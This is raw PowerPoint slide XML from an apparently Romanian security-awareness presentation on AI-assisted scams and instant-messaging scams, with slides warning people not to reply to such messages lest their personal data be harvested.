        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Title here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0350F54F-8D07-A29E-4B7E-25C533470137}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404432" y="1341737"/>
            <a:ext cx="11415086" cy="337718"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" cap="all" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CLICK TO EDIT MASTER TEXT STYLES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4852701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29.xml"/><Relationship Id="rId4"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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout30.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4836CA-7AD8-DDB3-5DCF-D56FC7CE8362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401627" y="718156"/>
            <a:ext cx="11415924" cy="594360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="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388850AA-E4EA-7937-168C-99644B046978}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="1802167"/>
            <a:ext cx="11415924" cy="4849927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="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Google Shape;70;p1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68719CDA-36CD-3663-0FC3-B9CCD9AE0A52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>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395913" y="275154"/>
            <a:ext cx="1596717" cy="228941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415827123"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483673" r:id="rId1"/>
    <p:sldLayoutId id="2147483669" r:id="rId2"/>
    <p:sldLayoutId id="2147483650" r:id="rId3"/>
    <p:sldLayoutId id="2147483670" r:id="rId4"/>
    <p:sldLayoutId id="2147483659" r:id="rId5"/>
    <p:sldLayoutId id="2147483652" r:id="rId6"/>
    <p:sldLayoutId id="2147483660" r:id="rId7"/>
    <p:sldLayoutId id="2147483690" r:id="rId8"/>
    <p:sldLayoutId id="2147483654" r:id="rId9"/>
    <p:sldLayoutId id="2147483664" r:id="rId10"/>
    <p:sldLayoutId id="2147483662" r:id="rId11"/>
    <p:sldLayoutId id="2147483671" r:id="rId12"/>
    <p:sldLayoutId id="2147483663" r:id="rId13"/>
    <p:sldLayoutId id="2147483696" r:id="rId14"/>
    <p:sldLayoutId id="2147483697" r:id="rId15"/>
    <p:sldLayoutId id="2147483691" r:id="rId16"/>
    <p:sldLayoutId id="2147483699" r:id="rId17"/>
    <p:sldLayoutId id="2147483655" r:id="rId18"/>
    <p:sldLayoutId id="2147483674" r:id="rId19"/>
    <p:sldLayoutId id="2147483693" r:id="rId20"/>
    <p:sldLayoutId id="2147483695" r:id="rId21"/>
    <p:sldLayoutId id="2147483689" r:id="rId22"/>
    <p:sldLayoutId id="2147483667" r:id="rId23"/>
    <p:sldLayoutId id="2147483666" r:id="rId24"/>
    <p:sldLayoutId id="2147483668" r:id="rId25"/>
    <p:sldLayoutId id="2147483672" r:id="rId26"/>
    <p:sldLayoutId id="2147483700" r:id="rId27"/>
    <p:sldLayoutId id="2147483703" r:id="rId28"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0" hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:title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1pPr>
      <a:lvl2pPr marL="274320" indent="-182880" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="006EFF"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
        <a:buChar char="↳"/>
        <a:defRPr sz="1400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="548640" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="006EFF"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="»"/>
        <a:defRPr sz="1200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="731520" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:srgbClr val="006EFF"/>
        </a:buClr>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="7224" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="454" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" pos="2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118CDC4-1F78-2F4D-9DDB-7B81AE34066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5909" y="282716"/>
            <a:ext cx="1329947" cy="190691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="942061037"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483687"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118CDC4-1F78-2F4D-9DDB-7B81AE34066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5909" y="282716"/>
            <a:ext cx="1329947" cy="190691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="684580867"/>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video" Target="https://www.youtube.com/embed/AVEkvCjOqA4?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hyperlink" Target="https://chatgpt.keytool.cc/" TargetMode="Externa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hand holding a shield&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7088E67C-2635-9A2B-8D09-BAAEE471B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2885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creenshot of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92B6994-BB88-48C6-B0B8-CB74CF654A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526" b="15526"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F806D713-A10A-BE3F-C9E0-A8971638E662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The big </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pictue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>literalmente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1328AB19-5E44-3587-7FD2-FACD676D5A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A blue rectangle with text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AB5E461-22F3-A35E-0590-191624249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130" y="5244853"/>
            <a:ext cx="7340600" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237527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31355-853A-29B4-634F-477CD9C15703}"/>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F8BD7DD1-E916-8C25-25FE-0BF85C7D9A98}"/>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1EBC7E1A-534B-FD83-F1D8-34C8270DD89C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scam-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cu AI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cum am </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reinventat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>noi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bunul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>simț</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A61A5E3-6BFE-5B49-692E-F42DF8458C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1886276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12ADE2-995D-26B7-695A-6DBC82538F2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scam-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pe instant messaging</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C9B861-7E58-2361-6C22-1829F828675E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A screenshot of a phone&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC00C2CD-E7CA-1FBE-0331-8F1EE4A6B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947" y="1853852"/>
            <a:ext cx="2303132" cy="5004148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A screenshot of a phone&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F8C3FE8-FCB2-1311-1E76-0400E334E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017" y="1853852"/>
            <a:ext cx="2303132" cy="5004148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="A screenshot of a phone&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99B2CFC7-3A7A-C2A6-0F07-C128E6E80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087" y="1853852"/>
            <a:ext cx="2303132" cy="5004147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="656653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EBA8C-945C-085F-FE93-96EE53DC324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C929A8B-7243-7CFB-529F-1A69BB3A09B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nu  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>răspundeți</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>acestui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tip de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mesaj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Riscați</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>să</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ajungeți</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CRM cu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>datele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>personale</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>datele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>angajatorului</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cu arbore genealogic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cu rude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>familie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> nu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vreți</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>să</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>afle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>informații</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>publice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>că</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trebuie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cheie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unică</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>telefon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>filtrare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D0898ED-B281-7E13-7A08-9F26E19A50D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
